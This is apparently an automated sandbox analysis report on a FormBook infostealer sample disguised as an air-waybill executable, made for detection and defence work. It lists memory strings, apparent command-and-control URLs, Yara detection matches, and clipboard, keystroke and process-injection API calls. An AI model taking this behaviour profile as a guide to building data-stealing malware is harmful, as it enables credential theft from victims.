            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/menu.css?ver=6.5.5
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/owl.carousel.css?ver=6.5.5
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/skin-default.css?ver=6.5.5
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/js/animation/animate.js?ver=6.
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/js/bootstrap.min.js?ver=6.5.5
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/js/custom.js?ver=6.5.5
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/js/jquery.min.js?ver=6.5.5
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/js/main.js?ver=6.5.5
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/js/owl.carousel.min.js?ver=6.5
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/js/wow.js?ver=6.5.5
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/style.css?ver=6.5.5
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-includes/css/dist/block-library/style.min.css?ver=6.5.5
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-includes/js/comment-reply.min.js?ver=6.5.5
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.17
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=6.5.5
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004822000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003C62000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://vintagewins.com/n8dl/?vX=FC28
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004CD8000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000004118000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://voupeclients.com
            Source: jFlHFdZgIYNZqR.exe, 00000005.00000002.23185812160.0000000000E75000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.orthonow.live
            Source: jFlHFdZgIYNZqR.exe, 00000005.00000002.23185812160.0000000000E75000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.orthonow.live/c7lp/
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000003EB6000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.00000000032F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aaa.za1.jecxs.cn/123.html
            Source: RpcPing.exe, 00000004.00000003.18883512956.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
            Source: RpcPing.exe, 00000004.00000003.18883512956.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.userway.org/widget.js
            Source: RpcPing.exe, 00000004.00000002.23187811443.00000000049B4000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003DF4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: 45570IH2.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RpcPing.exe, 00000004.00000003.18883512956.0000000007B99000.00000004.00000020.00020000.00000000.sdmp, 45570IH2.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: 45570IH2.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat%3A300%2C300i%2C400%2C400i%2C500%2C500i%2C600%2C70
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000003EB6000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.00000000032F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?800ccf274c3a593a3653e6acbfb00c7c
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000003EB6000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.00000000032F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?be472e8744edb3816324a1183cdffac6
            Source: jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://i0.wp.com/lakemontbellevue.net/wp-content/uploads/2024/05/Lakemont-Logo-1-1.png?fit=220%2C70
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://i0.wp.com/lakemontbellevue.net/wp-content/uploads/2024/05/MacPhersons-Logo.png?resize=150%2C
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://i0.wp.com/lakemontbellevue.net/wp-content/uploads/2024/05/MacPhersons-Logo.png?resize=300%2C
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://i0.wp.com/lakemontbellevue.net/wp-content/uploads/2024/05/MacPhersons-Logo.png?w=512&amp;ssl
            Source: jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://i0.wp.com/lakemontbellevue.net/wp-content/uploads/2024/05/cropped-Lakemont-favicon.png?fit=1
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://i0.wp.com/lakemontbellevue.net/wp-content/uploads/2024/05/cropped-Lakemont-favicon.png?fit=2
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://i0.wp.com/lakemontbellevue.net/wp-content/uploads/2024/05/cropped-Lakemont-favicon.png?fit=3
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net
            Source: jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/
            Source: jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/#/schema/logo/image/
            Source: jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/#organization
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/#website
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/?s=
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/comments/feed/
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/feed/
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/privacy-policy/
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/wp-content/uploads/2024/05/Lakemont-Logo-1-1.png
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/wp-content/uploads/2024/05/MacPhersons-Logo.png
            Source: jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/wp-json/
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lakemontbellevue.net/xmlrpc.php?rsd
            Source: RpcPing.exe, 00000004.00000003.19090634161.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18795960669.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18795622494.0000000002E37000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23185487157.0000000002E54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: RpcPing.exe, 00000004.00000003.19090634161.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18795960669.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18795622494.0000000002E37000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23185487157.0000000002E54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: RpcPing.exe, 00000004.00000003.19090634161.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18795960669.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18795622494.0000000002E37000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23185487157.0000000002E54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://macphersonspm.appfolio.com/connect/users/sign_in
            Source: RpcPing.exe, 00000004.00000002.23185424032.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.19092094755.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
            Source: RpcPing.exe, 00000004.00000002.23185424032.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.19092094755.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://schema.org
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://stats.wp.com/e-202427.js
            Source: RpcPing.exe, 00000004.00000002.23189698242.0000000007B82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: RpcPing.exe, 00000004.00000003.18883512956.0000000007B99000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23189698242.0000000007BF0000.00000004.00000020.00020000.00000000.sdmp, 45570IH2.4.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
            Source: RpcPing.exe, 00000004.00000003.18883512956.0000000007B99000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23189698242.0000000007BF0000.00000004.00000020.00020000.00000000.sdmp, 45570IH2.4.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: RpcPing.exe, 00000004.00000002.23189323501.00000000060C0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23187811443.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.000000000361A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: RpcPing.exe, 00000004.00000003.18883512956.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
            Source: 45570IH2.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.monsterinsights.com/
            Source: RpcPing.exe, 00000004.00000002.23187811443.000000000518E000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.00000000045CE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.paliinfra.com/12kg/?vX=FNzl8wnE
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.schema.org/SiteNavigationElement
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0047425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0047425A
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00474458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474458
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0047425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0047425A
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00460219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00460219
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0048CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0048CDAC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.18532632938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.23186298424.00000000050F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.23186502535.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.23186224923.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.18534395996.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.18532632938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.23186298424.00000000050F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.23186502535.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.23186224923.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.18534395996.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: This is a third-party compiled AutoIt script.0_2_00403B4C
            Source: AWB NO. 077-57676135055.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: AWB NO. 077-57676135055.exe, 00000000.00000000.18119188502.00000000004B5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_144c086d-f
            Source: AWB NO. 077-57676135055.exe, 00000000.00000000.18119188502.00000000004B5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d05e85b2-d
            Source: AWB NO. 077-57676135055.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5dce06c9-2
            Source: AWB NO. 077-57676135055.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_b5d8b72a-5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C223 NtClose,2_2_0042C223
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F734E0 NtCreateMutant,LdrInitializeThunk,2_2_02F734E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72A80 NtClose,LdrInitializeThunk,2_2_02F72A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_02F72B90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_02F72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74260 NtSetContextThread,2_2_02F74260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74570 NtSuspendThread,2_2_02F74570
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AC0 NtEnumerateValueKey,2_2_02F72AC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AA0 NtQueryInformationFile,2_2_02F72AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72A10 NtWriteFile,2_2_02F72A10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BE0 NtQueryVirtualMemory,2_2_02F72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BC0 NtQueryInformationToken,2_2_02F72BC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B80 NtCreateKey,2_2_02F72B80
